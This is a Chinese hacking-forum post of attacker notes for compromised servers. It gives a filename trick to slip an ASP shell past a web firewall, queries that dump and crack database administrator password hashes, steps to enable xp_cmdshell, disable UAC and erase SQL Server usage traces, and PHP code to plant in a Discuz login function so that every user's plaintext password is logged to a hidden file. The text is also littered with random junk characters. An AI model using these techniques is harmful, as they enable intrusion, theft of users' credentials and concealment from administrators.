其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录& F. p- f3 D+ n/ ]2 K4 A7 ]
利用II6文件解析漏洞绕过安全狗代码:
1 n0 D4 ]/ i. k8 `% E K3 X; ~;antian365.asp;antian365.jpg
& s+ y* X' [. p. ^1 l- l0 L
W- E! I. m ~8 R, F! G: Z各种类型数据库抓HASH破解最高权限密码!& G' k0 C b: ^/ K3 r, N3 i
1.sql server20004 |+ V% f% a) L$ f3 k& e, [
SELECT password from master.dbo.sysxlogins where name='sa'( x2 }( O- R' B
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
+ V8 s$ [. @1 d4 ~! p: [ r' r2FD54D6119FFF04129A1D72E7C3194F7284A7F3A5 w4 Q" n( B/ X/ t
/ @+ S/ r9 o, Z! }: y$ a3 _0×0100- constant header
9 n1 l0 C6 U% `# p34767D5C- salt8 V7 j* F& G4 Q6 O
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
0 l( j J, H$ m+ u: Z- q9 |" a; T2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
5 z$ L6 j. F! z$ ocrack the upper case hash in ‘cain and abel’ and then work the case sentive hash, w7 g" p$ j" K) q: f, e
SQL server 2005:-1 X3 j* q( u' |# z
SELECT password_hash FROM sys.sql_logins where name='sa'1 N, P) b$ D3 C) b% }; }
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
7 p, p' U# o& G t5 m0×0100- constant header
. m S' C3 f9 K) p3 \8 L3 Z8 J; I993BF231-salt/ r1 l E! d) W( y
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash2 C+ Z& W2 d8 r' \
crack case sensitive hash in cain, try brute force and dictionary based attacks.6 l; V* g, l) t8 y4 z W% U0 A
, H: V, d7 r& t6 ~
update:- following bernardo’s comments:-
. W5 U) r( M4 L$ Y( H3 Ause function fn_varbintohexstr() to cast password in a hex string.
R% z" B& g I) n) u; D' w& J0 pe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins' ~, W3 o8 j" `: E0 S% r
: J) ~) {6 B5 Q" h# {# rMYSQL:-
3 G, d/ d; r1 ^, d+ n
! Z' P3 Y0 j1 u" EIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.2 b$ p; G A2 L* V
( X6 ` L' A- j*mysql < 4.1
0 C; a. b; g, K) D! p' B% _% w/ S7 C% B$ f ?. _, A( H w
mysql> SELECT PASSWORD(‘mypass’);' e0 C" r' u6 d# k+ w
+——————–+
* N1 L. y6 w+ i9 K0 P| PASSWORD(‘mypass’) |
/ c( w; r1 J/ h: ?2 `1 v9 n. [* u+——————–+& Y5 h4 ?/ ~9 P5 L: l
| 6f8c114b58f2ce9e |
$ M; K. R# L8 M4 f+——————–+
/ X' M9 O7 a) E
; Q" o' A. d( b {" _! A*mysql >=4.1
' P- X6 I2 t; U+ @# p% C9 C
; T# b: P+ @4 M1 v6 q v" D. Smysql> SELECT PASSWORD(‘mypass’);# _# z q# y( ]. Q2 `3 N
+——————————————-+
) ?: s2 O* e, J4 a" s1 P. a+ y| PASSWORD(‘mypass’) |" P# r& M& B0 d! m0 L& X" t& b% ]
+——————————————-+
. |0 J3 S# P ^% B9 O6 S| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
7 j2 y* `. B- d; E+ E% F+——————————————-+
* w1 Q5 [, X2 s* [/ [! b
1 j7 i" H+ Z9 E& TSelect user, password from mysql.user: G$ e" z2 Z! C1 L1 a7 b9 Q
The hashes can be cracked in ‘cain and abel’
9 T0 ]' p( l' W- l% F A' c+ K
% X: L- a" m/ J4 xPostgres:-
/ z2 g- t! ^# w0 F8 [Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)) j; A* U7 R: [+ g2 v, C
select usename, passwd from pg_shadow;
8 I/ I1 c& O& J( ?( Wusename | passwd
0 U) j7 j2 F4 i# E6 f( `——————+————————————-
) T8 X+ n8 V6 q: r0 u( A$ Ptestuser | md5fabb6d7172aadfda4753bf0507ed4396
, C3 l7 B. x% Q0 T; \, Euse mdcrack to crack these hashes:-* e6 W( w# I, g' m9 N$ L3 Z
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
L# n+ S; R, x0 W8 R; y3 b! H2 l
Oracle:-! b# v4 H$ Q& m- k8 T
select name, password, spare4 from sys.user$! J, ?4 ~# {* |$ y' u" M9 i4 e$ n
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 |8 s$ h& T9 w( ZMore on Oracle later, i am a bit bored….3 H& }/ e- }' Z X
8 u. n& `, K; N* w" U* g9 z$ ]9 R% n2 l# t+ c
在sql server2005/2008中开启xp_cmdshell
/ o' F& A' f- }9 l& p: Q) b W' r7 H-- To allow advanced options to be changed.
7 g. H5 a3 z1 T1 `; G% |EXEC sp_configure 'show advanced options', 1
' A% a( G& m9 V; CGO- {1 T, l7 O! u! b
-- To update the currently configured value for advanced options.4 J& T* ?+ n/ W' J2 \
RECONFIGURE- V5 V5 x! n/ l, x2 c- d1 V
GO$ \/ u+ y w/ J9 \3 u# o
-- To enable the feature.3 V6 V ]* d( H" {& N4 x+ } m# ]
EXEC sp_configure 'xp_cmdshell', 1
, ~& e; n/ v8 _; ~) ~GO& q/ l0 ]" O/ n) v! r; h
-- To update the currently configured value for this feature.7 J/ K, o) `' R8 C
RECONFIGURE
) o8 L# r! t, FGO$ D9 J# A& c8 p" }
SQL 2008 server日志清除,在清楚前一定要备份。" E8 n6 N/ Z! Y" L3 K5 ]
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
- E# v* o/ X' A, h! X! fX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin4 i6 m5 O: z* I5 K Q/ ]9 r4 V
9 s; q: |5 u- C# r& }- A对于SQL Server 2008以前的版本:
. j$ c0 `' S6 } Y3 OSQL Server 2005:
! Z5 w3 w& Y% m. N4 ~+ R删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
$ S! V% ]) d6 ]& f: MSQL Server 2000:# {2 f2 u) u2 N
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
- H0 b* d- M; F2 ]* u$ T" B! K% N& q( N
本帖最后由 simeon 于 2013-1-3 09:51 编辑. u% R% S9 z/ F' b
/ L8 Y8 ^# w* T ^4 H# V& \% ^0 f
6 H: z4 v1 r! ewindows 2008 文件权限修改. f3 r8 K1 O6 B$ r3 ~2 n/ M
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx4 q9 t4 l( J) v# m: b
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad989 h1 a: r6 @& S: M3 Z* G [
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,- I1 f( l2 a' l) ?$ j( ?
" G& Q! k% j: z1 C- Q( ^" S" @
Windows Registry Editor Version 5.00
; Q9 u7 c/ b/ h[HKEY_CLASSES_ROOT\*\shell\runas]
! L* X2 Y( R8 G0 M@="管理员取得所有权"
; h) f: ^1 [) ]9 }"NoWorkingDirectory"=""
5 l, d: m6 w2 v4 f[HKEY_CLASSES_ROOT\*\shell\runas\command]
* ^' b7 R( s) ?( `@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F") c4 x2 }) M8 G m4 V
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ l6 i v5 Z3 N! b2 S: X[HKEY_CLASSES_ROOT\exefile\shell\runas2]( h. b W" ^8 f2 E" h7 ~4 w
@="管理员取得所有权"2 p! x! r4 R4 l9 F+ `
"NoWorkingDirectory"=""+ C$ W: V' S( h* [1 u5 M H7 U
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
. P! O I' W* ^' Y* G@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' j* u3 o# ~+ t
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* q, w$ f7 X- c0 C" V
3 G- P( U& ^& d- @8 Z[HKEY_CLASSES_ROOT\Directory\shell\runas]
# N8 d% |; s/ K* Y4 f# B@="管理员取得所有权"
* v4 d; a2 l+ Y+ v+ z8 T"NoWorkingDirectory"=""
" e6 b0 W0 @3 M9 ?: X[HKEY_CLASSES_ROOT\Directory\shell\runas\command] S$ [8 z& u! R& \
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
' ]* X; |; p& e& A"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
" l$ Z$ d; F; Z: k9 n
% R: C6 g( x& R/ |
5 D" q& Z( f* J0 D2 V( A$ O3 xwin7右键“管理员取得所有权”.reg导入8 z9 A0 `$ P8 g/ G& d) T1 O! d
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,* w% X) t) b; F2 J U
1、C:\Windows这个路径的“notepad.exe”不需要替换3 ?8 T% ^8 g( B0 ^ S! ~% a$ K
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
8 A% t; O) H- J$ I) Y3、四个“notepad.exe.mui”不要管" C, Y& Q- X" B4 `0 \6 G) {# B# r
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
% v' c6 Q) |5 j2 w, p# YC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
5 z* `! r5 K2 @1 s! p9 Q替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,9 u7 Y8 K( x. E- I/ ^$ p
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
9 q7 Q) u+ ?* E: m* Nwindows 2008中关闭安全策略:
0 G3 }1 V3 C% g" Treg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% q7 l& R, u7 \. {3 p6 i修改uc_client目录下的client.php 在
+ H# y2 n: |! `$ C" o2 ^function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {- H# r3 n! R9 J! w1 v
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
, S7 J5 y' W( C! c- l! b2 s$ X" R你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw: P: {7 c8 Q, o# {
if(getenv('HTTP_CLIENT_IP')) {
- ?5 O. T, T2 D- l/ z0 M+ ~$onlineip = getenv('HTTP_CLIENT_IP');+ j2 K- u9 I7 K' \8 G0 A0 Y+ d
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {. U# @* ^# k$ q) j. S; ~
$onlineip = getenv('HTTP_X_FORWARDED_FOR');/ n% s) N; ]- r z! e: l
} elseif(getenv('REMOTE_ADDR')) { ^' u9 p% y4 w! I4 O
$onlineip = getenv('REMOTE_ADDR');
/ F9 O9 B( O4 R} else {
" v2 ?' D' _5 u5 x& r$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 r7 T( P5 Y8 c8 Q}
1 v+ z% M7 Y1 N. Q# q $showtime=date("Y-m-d H:i:s"); l1 F- n8 K! Z6 {0 z5 [
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
( |4 O5 T& @7 O' u: x2 } $handle=fopen('./data/cache/csslog.php','a+');, x! y0 ~6 w3 j) J/ R9 A; o
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对